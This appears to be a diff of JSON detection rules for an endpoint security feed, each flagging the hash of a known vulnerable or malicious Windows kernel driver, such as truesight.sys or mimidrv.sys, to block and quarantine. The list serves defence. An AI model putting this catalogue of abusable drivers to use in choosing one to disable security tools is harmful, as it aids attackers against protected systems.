+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97744605f30900e2683e4d350ff13ac9a99d277217a53801afd7075d4f12acbd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53d7e0f5-f489-5f27-9ebe-8f47a88d8bbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616115Z",
+ "creation_date": "2026-03-23T11:45:29.616117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bda0108de82ebeae82f43108046c5feb6f042e312fa0115475a9e32274fae59",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53fbf268-35fd-5cfc-ad29-7c610baa5971",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808902Z",
+ "creation_date": "2026-03-23T11:45:31.808904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47945068899bc61f8607d27995c73b3cb7228cded69f9ec96485e0c0f44ea2bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5411539a-0196-5268-841f-ab7ddbef4d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818330Z",
+ "creation_date": "2026-03-23T11:45:30.818332Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f64a78b1294e6837f12f171a663d8831f232b1012fd8bae3c2c6368fbf71219b",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5411c76f-f733-5710-9e82-9a05fc418419",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825940Z",
+ "creation_date": "2026-03-23T11:45:30.825944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a1e98520eab5654dbfec4d96d9a2c90c874882f41aae2a38d746e83a11bb96d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "541945b5-60e1-55f6-abeb-ceff7f5c8384",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982982Z",
+ "creation_date": "2026-03-23T11:45:29.982984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c36ace67f4e25f391e8709776348397e4fd3930e641b32c1b0da398e59199ca7",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5443dc9f-4fde-5fde-9e0c-4d604b2d0d3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154186Z",
+ "creation_date": "2026-03-23T11:45:31.154188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e31580793b8b73db0cc688a858522d9827aab9c726c3d06c948d4e4fb53e26a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "544af126-1a38-5af3-91f7-715e19602716",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149507Z",
+ "creation_date": "2026-03-23T11:45:31.149510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee8a5173f1b5da1bbfe049d646c2c2621ea36163fe4e66f37641562e842ea9dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "545460b2-4376-5b34-a71f-fa28fb7d311c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976939Z",
+ "creation_date": "2026-03-23T11:45:29.976941Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976954Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "091f6527aa79951fb0b4df269c0ea2247a13053e0d55784e29694381fe4f6fed",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54571b5c-42d1-5b5f-9bdc-b8ead4672067",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489144Z",
+ "creation_date": "2026-03-23T11:45:31.489146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77903888069df50a2d881c1cc50c6aea35e47bcee9acf603347eb0ea6c71ad47",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "545b3b9e-b903-59b6-8b96-8d20531dc7a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823063Z",
+ "creation_date": "2026-03-23T11:45:31.823066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b9a9b525d155296647f4288dcb64c3f5df82dd31f499cdf73abcef531121d0c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "545d0801-0984-5187-bf92-bb28ada9ce66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984619Z",
+ "creation_date": "2026-03-23T11:45:29.984621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9fead3227d5cf7daf8c5312db672bc7a684e2216b2f48ff2fcd14493bc9c254",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/2ada18ae-2c52-49b6-b1a0-cf3b267f6dc7/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "545f625a-f25c-5251-a839-ce21fca8fd80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452402Z",
+ "creation_date": "2026-03-23T11:45:30.452406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdc73f752c1353d41e877d8bf42a1c53f0bba7d6f52348aaef60e06f4d3087d0",
+ "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "545fa788-bd8a-50fd-90bd-30dae7d0b7ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481549Z",
+ "creation_date": "2026-03-23T11:45:30.481551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ce8583768720be90fae66eed3b6b4a8c7c64e033be53d4cd98246d6e06086d0",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "547ffa79-1314-5e96-93e7-5dd23ebe5192",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610441Z",
+ "creation_date": "2026-03-23T11:45:29.610443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "523d1d43e896077f32cd9acaa8e85b513bfb7b013a625e56f0d4e9675d9822ba",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "548e6fbf-d5f1-5867-a0d4-ed3fea70be40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809519Z",
+ "creation_date": "2026-03-23T11:45:31.809522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cea02a0e948cf58a39d404c6371aa7f3badeacc542d5173304cd75eea689f90e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54910e8b-283e-5fa8-b71d-dd3cc5473565",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150339Z",
+ "creation_date": "2026-03-23T11:45:31.150341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d97f87f747274a8ce33b70b6fc20361906672880ef474a85039538cef63f45f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5491403c-b558-5497-b1da-240cca8afa8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833938Z",
+ "creation_date": "2026-03-23T11:45:30.833941Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "912623216966eab3524716f2b68903f69487a577461a946b5e15a42804303561",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5492162c-3aa8-581a-a88c-a49c71ed5f00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807742Z",
+ "creation_date": "2026-03-23T11:45:31.807745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd2b9349201d03dfeeb1a47c3474e3d18cce36b6b8d8c3373d8e83a2aabfd1b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54998e06-fa00-5425-b217-1774336bb8e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467061Z",
+ "creation_date": "2026-03-23T11:45:30.467064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebc3a28af05f5b0b456f6ea59ad613109bbb1e2a888d7e3808e331335a77f087",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5499e5ac-acfb-516e-a2a5-04ed97f553c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612850Z",
+ "creation_date": "2026-03-23T11:45:29.612852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "549b2905-b170-5281-8571-96df7e84c434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463867Z",
+ "creation_date": "2026-03-23T11:45:30.463889Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "549e68e8-be40-52a3-abdd-340b05512cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481713Z",
+ "creation_date": "2026-03-23T11:45:30.481715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9aeead632435bda4f5723fff5c48dc60451072bfc8649f2ad6e066ca910934a",
